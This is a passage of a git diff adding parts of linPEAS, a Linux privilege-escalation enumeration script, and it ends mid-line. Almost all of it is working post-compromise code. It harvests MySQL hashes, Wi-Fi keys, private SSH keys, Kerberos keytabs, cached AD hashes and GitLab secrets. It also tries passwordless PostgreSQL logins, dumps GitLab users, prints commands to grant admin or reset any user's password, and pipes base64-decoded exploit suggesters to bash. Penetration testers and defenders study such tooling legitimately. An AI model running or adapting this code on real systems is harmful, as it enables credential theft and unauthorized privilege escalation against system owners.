$(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +else echo_not_found +fi +echo "" + +peass{MariaDB} + +peass{PostgreSQL} + +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +fi + +peass{Mongo} + +peass{Apache} + +peass{Tomcat} + +peass{FastCGI} + +peass{Http_conf} + +peass{Htpasswd} + +peass{PHP Sessions} + +peass{Wordpress} + +peass{Drupal} + +peass{Moodle} + +peass{Supervisord} + +peass{Cesi} + +peass{Rsync} + +peass{Hostapd} + +#-- SI) Wifi conns +print_2title "Searching wifi conns file" +wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) +if [ "$wifi" ]; then + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done +else echo_not_found +fi +echo "" + +peass{Anaconda ks} + +peass{VNC} + +peass{Ldap} + +peass{OpenVPN} + +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" + +peass{SSH} + +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," + +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi + +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then + echo "" + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" + +#-- SI) PAM auth +print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" +pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) +if [ "$pamssh" ]; then + grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- SI) NFS exports +print_2title "NFS exports?" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" +if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," +else echo_not_found "/etc/exports" +fi +echo "" + +#-- SI) Kerberos +print_2title "Searching kerberos conf files and tickets" +print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi +if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; +fi + +printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if echo "$f" | grep -q .k5login; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + elif echo "$f" | grep -q keytab; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif echo "$f" | grep -q krb5.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif echo "$f" | grep -q kadm5.acl; then + ls -l "$f" + cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + fi + fi +done +ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" +klist 2>/dev/null || echo_not_found "klist" +echo "" + +peass{Knockd} + +peass{Kibana} + +peass{Elasticsearch} + +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +else echo_not_found +fi +echo "" + +#-- SI) Vault-ssh +print_2title "Searching Vault-ssh files" +if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done + echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +else echo_not_found "vault-ssh-helper.hcl" +fi +echo "" + +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +print_2title "Searching AD cached hashes" +if [ "$adhashes" ]; then + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null +else echo_not_found "cached hashes" +fi +echo "" + +#-- SI) Screen sessions +print_2title "Searching screen sessions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +screensess=$(screen -ls 2>/dev/null) +if [ "$screensess" ]; then + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," +else echo_not_found "screen" +fi +echo "" + +#-- SI) Tmux sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +print_2title "Searching tmux sessions"$N +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," +else echo_not_found "tmux" +fi +echo "" + +peass{CouchDB} + +peass{Redis} + +#-- SI) Dovecot +# Needs testing +print_2title "Searching dovecot files" +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" +else + for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done +fi +echo "" + +peass{Mosquitto} + +peass{Neo4j} + +peass{Cloud Credentials} + +peass{Cloud Init} + +peass{CloudFlare} + +peass{Erlang} + +peass{GMV Auth} + +peass{IPSec} + +peass{IRSSI} + +peass{Keyring} + +peass{Filezilla} + +peass{Backup Manager} + +##-- SI) passwd files (splunk) +print_2title "Searching uncommon passwd files (splunk)" +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi +printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," + fi +done +echo "" + +print_2title "Analyzing kcpassword files" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" +printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +done +echo "" + +##-- SI) Gitlab +print_2title "Searching GitLab related files" +#Check gitlab-rails +if [ "$(command -v gitlab-rails)" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" +fi +if [ "$(command -v gitlab-backup)" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" +fi +#Check gitlab files +printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if echo $f | grep -q secrets.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif echo $f | grep -q gitlab.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 "repositories:" + elif echo $f | grep -q gitlab.rb; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" +done +echo "" + +peass{Github} + +peass{Svn} + +peass{PGP-GPG} + +peass{Cache Vi} + +peass{Wget} + +##-- SI) containerd installed +print_2title "Checking if containerd(ctr) is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" +containerd=$(command -v ctr) +if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list +fi +echo "" + +##-- SI) runc installed +print_2title "Checking if runc is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" +runc=$(command -v runc) +if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +fi +echo "" + +#-- SI) Docker +print_2title "Searching docker files (limit 70)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" +printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi +done +echo "" + +peass{Firefox} + +peass{Chrome} + +peass{Autologin} + +#-- SI) S/Key athentication +print_2title "S/Key authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi +fi +echo "" + +#-- SI) YubiKey athentication +print_2title "YubiKey authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi +fi +echo "" + +#-- SI) Passwords inside pam.d +print_2title "Passwords inside pam.d" +grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," +echo "" + + + +peass{SNMP} + +peass{Pypirc} + +peass{Postfix} + +peass{Ldaprc} + +peass{Env} + +peass{Msmtprc} + +peass{Keepass} + +peass{FTP} + +peass{EXTRA_SECTIONS} + +peass{Interesting logs} + +peass{Windows Files} + +peass{Other Interesting Files} diff --git a/linPEAS/builder/linpeas_parts/system_information.sh b/linPEAS/builder/linpeas_parts/system_information.sh new file mode 100644 index 0000000..4967d6a --- /dev/null +++ b/linPEAS/builder/linpeas_parts/system_information.sh @@ -0,0 +1,185 @@ +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then +warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#--SY) USBCreator +print_2title "USBCreator" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" +if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then +pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") +if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) +fi +if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," + fi +fi +fi +echo "" + +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" + +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" + +#-- SY) System stats +print_2title "System stats" +(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" +warn_exec free 2>/dev/null +echo "" + +#-- SY) CPU info +print_2title "CPU info" +warn_exec lscpu 2>/dev/null +echo "" + +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" + +#-- SY) Dmesg +print_2title "Searching Signature verification failed in dmseg" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" +(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" +echo "" + +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then + print_2title "Kernel Extensions not belonging to apple" + kextstat 2>/dev/null | grep -Ev " com.apple." + + print_2title "Unsigned Kernel Extensions" + macosNotSigned /Library/Extensions + macosNotSigned /System/Library/Extensions +fi + +if [ "$(command -v bash 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester" + print_info "https://github.com/mzet-/linux-exploit-suggester" + les_b64="peass{LES}" + echo $les_b64 | base64 -d | bash + echo "" +fi + +if [ "$(command -v perl 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester 2" + print_info "https://github.com/jondonas/linux-exploit-suggester-2" + les2_b64="peass{LES2}" + echo $les2_b64 | base64 -d | perl + echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Doctor Suggestions" + brew doctor + echo "" +fi + + + +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then + aa-status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then + ls -d /etc/apparmor* +else + echo_not_found "AppArmor" +fi + +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") + +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," + +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then + print_list "Gatekeeper enabled? .......... "$NC + (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + + print_list "sleepimage encrypted? ........ "$NC + (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no + + print_list "XProtect? .................... "$NC + (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no + + print_list "SIP enabled? ................. "$NC + csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no + + print_list "Connected to JAMF? ........... "$NC + warn_exec jamf checkJSSConnection + + print_list "Connected to AD? ............. "$NC + dsconfigad -show && echo "" || echo_no +fi + +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; +else + if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi + echo "" +fi + +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null + +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... "$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then + detectedvirt=$(systemd-detect-virt) + if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi +else + if [ 